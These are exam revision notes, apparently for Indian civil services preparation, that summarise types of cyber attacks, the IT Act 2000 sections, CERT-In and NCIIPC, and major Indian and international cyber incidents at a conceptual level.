Types of Cyber Attacks — Revision Notes
⚡ 30-Second Revision
- Network attacks: DDoS, MITM, DNS spoofing target infrastructure
- Application attacks: SQL injection, XSS, zero-day exploit software vulnerabilities
- Social engineering: Phishing, spear phishing, pretexting exploit human psychology
- Physical attacks: USB drops, shoulder surfing require direct access
- Insider threats: Malicious/negligent employees abuse legitimate access
- State-sponsored: APTs conduct long-term espionage campaigns
- Legal framework: IT Act Sections 43 (civil penalties), 66 (criminal), 69 (interception), 70 (protected systems)
- Key institutions: CERT-In (incident response), NCIIPC (critical infrastructure)
- Major incidents: 2016 debit card breach (3.2M affected), 2022 AIIMS ransomware
2-Minute Revision
Cyber attacks classification encompasses six primary categories targeting different vulnerabilities. Network-based attacks like DDoS overwhelm systems with traffic, while MITM attacks intercept communications.
Application-layer attacks exploit software vulnerabilities through SQL injection (database manipulation) and XSS (malicious script injection). Zero-day exploits target unknown vulnerabilities, making them particularly dangerous.
Social engineering attacks manipulate human psychology - phishing uses deceptive emails, spear phishing targets specific individuals, while pretexting creates false scenarios. Physical attacks require direct access, including USB drops and shoulder surfing.
Insider threats involve employees misusing legitimate access, either maliciously or negligently. State-sponsored attacks represent sophisticated, persistent campaigns typically attributed to nation-states seeking strategic advantage.
India's legal framework includes IT Act 2000 with key sections: 43 (unauthorized access, civil penalties up to ₹1 crore), 66 (computer crimes, 3 years imprisonment), 69 (government interception powers), and 70 (protected systems, 10 years imprisonment).
CERT-In provides 24/7 incident response, while NCIIPC protects critical infrastructure. Major incidents include 2016 debit card breach affecting 3.2 million cards and 2022 AIIMS ransomware disrupting healthcare services, highlighting vulnerabilities in critical sectors.
5-Minute Revision
Comprehensive cyber attack taxonomy reveals the multifaceted nature of digital threats facing India's rapidly digitalizing economy. Network-based attacks target communication infrastructure through DDoS (overwhelming servers with traffic), Man-in-the-Middle attacks (intercepting communications), and DNS spoofing (redirecting users to malicious sites).
These attacks can disrupt essential services and compromise data integrity during transmission. Application-layer attacks exploit software vulnerabilities with SQL injection manipulating database queries to extract sensitive information, Cross-Site Scripting (XSS) injecting malicious scripts into web applications, and zero-day exploits targeting previously unknown vulnerabilities before patches are available.
The sophistication of these attacks has increased significantly, with state actors investing heavily in zero-day research. Social engineering attacks recognize humans as the weakest security link, employing phishing (deceptive communications), spear phishing (targeted attacks on specific individuals), pretexting (fabricated scenarios), and baiting (exploiting curiosity through infected devices).
These attacks have evolved from obvious spam to sophisticated campaigns researching targets extensively. Physical attacks demonstrate that cyber security extends beyond digital boundaries, including USB drops (leaving infected devices), shoulder surfing (observing password entry), and tailgating (following authorized personnel).
Insider threats pose unique challenges as they involve individuals with legitimate access - malicious insiders deliberately abuse privileges while negligent employees create vulnerabilities through careless practices.
State-sponsored attacks represent the most sophisticated category, characterized by Advanced Persistent Threat (APT) techniques involving long-term network presence, custom malware, and strategic objectives beyond financial gain.
India's legal response framework centers on IT Act 2000 with 2008 amendments addressing emerging threats. Section 43 covers unauthorized access with civil penalties up to ₹1 crore, Section 66 criminalizes computer-related offenses with imprisonment up to three years, Section 69 empowers government interception and monitoring, while Section 70 addresses protected systems with enhanced penalties up to 10 years imprisonment.
The Indian Penal Code supplements these provisions through fraud (419, 420) and forgery (463-468) sections. Institutional response involves CERT-In providing 24/7 incident monitoring and response capabilities, NCIIPC protecting critical information infrastructure, and specialized cyber crime investigation units.
Recent incidents demonstrate evolving threat landscape: the 2016 debit card breach affected 3.2 million cards across multiple banks, the 2018 Cosmos Bank attack resulted in ₹94 crore losses through coordinated ATM and SWIFT attacks, and the 2022 AIIMS ransomware attack disrupted healthcare services for weeks.
These incidents highlight the intersection of cyber security with national security, economic stability, and essential service delivery in digital India.
Prelims Revision Notes
- IT Act 2000 Key Sections: Section 43 (unauthorized access, civil penalties ₹1 crore max), Section 66 (computer crimes, 3 years imprisonment), Section 66A (struck down by Supreme Court 2015), Section 69 (government interception powers), Section 70 (protected systems, 10 years imprisonment)
- Attack Classifications: Network (DDoS, MITM, DNS spoofing), Application (SQL injection, XSS, zero-day), Social Engineering (phishing, spear phishing, pretexting, baiting), Physical (USB drops, shoulder surfing), Insider (malicious/negligent employees), State-sponsored (APTs)
- Key Institutions: CERT-In (Computer Emergency Response Team India, 24/7 incident response), NCIIPC (National Critical Information Infrastructure Protection Centre), MeitY (policy formulation), CBI Cyber Crime Cell
- Major Incidents with Dates: 2016 debit card breach (3.2 million cards affected), 2018 Cosmos Bank attack (₹94 crore loss), 2022 AIIMS ransomware (healthcare services disrupted), 2020 Mobikwik data breach (100 million users)
- Legal Penalties: IT Act civil penalties up to ₹1 crore, criminal provisions 3-10 years imprisonment, IPC sections 419-420 (fraud), 463-468 (forgery) applicable to cyber crimes
- Attack Characteristics: Zero-day (unknown vulnerabilities), APT (long-term persistence), DDoS (traffic flooding), Phishing (deceptive communication), SQL injection (database manipulation)
- Recent Policy Updates: CERT-In directions 2022 (6-hour incident reporting), National Cyber Security Strategy 2020, Personal Data Protection Bill provisions
- International Examples: Stuxnet (Iran nuclear facilities), WannaCry (global ransomware 2017), SolarWinds (supply chain attack), Equifax breach (147 million affected)
Mains Revision Notes
- Analytical Framework for Cyber Attacks: Threat Actor Analysis (cybercriminals, hacktivists, nation-states, insiders) → Attack Vector Assessment (network, application, social, physical) → Impact Evaluation (confidentiality, integrity, availability) → Response Strategy (prevention, detection, response, recovery)
- Evolution of Threat Landscape: Phase 1 (2000-2010): Individual hackers, simple malware, opportunistic attacks; Phase 2 (2010-2020): Organized cybercrime, financial motivation, sophisticated tools; Phase 3 (2020-present): State-sponsored campaigns, critical infrastructure targeting, AI-powered attacks
- Attribution Challenges: Technical obfuscation through proxy servers and anonymization tools, false flag operations mimicking other threat actors, legal complexities in cross-border investigations, time-sensitive evidence collection requirements
- Critical Infrastructure Vulnerabilities: Power grid SCADA systems susceptible to network attacks, financial sector exposure to APTs and insider threats, telecommunications infrastructure targeted for espionage, healthcare systems vulnerable to ransomware attacks
- Human Factor in Cyber Security: Social engineering success rates 60-90% due to psychological manipulation, cultural factors affecting security awareness, remote work expanding attack surfaces, need for continuous security training and awareness programs
- Legal Framework Gaps: Jurisdictional challenges in cyberspace, evidence collection and preservation difficulties, need for specialized cyber courts and trained personnel, balancing security measures with privacy rights and civil liberties
- International Cooperation Requirements: Mutual Legal Assistance Treaties (MLATs) for cross-border investigations, information sharing mechanisms with allied nations, capacity building programs for developing countries, diplomatic responses to state-sponsored attacks
- Emerging Threats and Future Challenges: AI-powered attacks adapting to defensive measures, quantum computing threats to current encryption, IoT device proliferation expanding attack surfaces, deepfake technology enabling sophisticated disinformation campaigns
Vyyuha Quick Recall
Vyyuha Quick Recall - SHIELD Framework for Cyber Attack Types: S - Social engineering attacks (phishing, spear phishing, pretexting) exploiting human psychology and trust relationships; H - Hardware and physical attacks (USB drops, shoulder surfing, tailgating) requiring direct access to systems or observation; I - Insider threats from malicious employees or negligent staff abusing legitimate access privileges; E - External network attacks (DDoS, Man-in-the-Middle, DNS spoofing) targeting communication infrastructure; L - Logic and application attacks (SQL injection, XSS, zero-day exploits) exploiting software vulnerabilities; D - Data breaches and state-sponsored espionage (APTs) conducting long-term intelligence gathering campaigns.
Memory aid: 'SHIELD protects against all cyber attack vectors' - each letter represents a major attack category that comprehensive cyber security must address.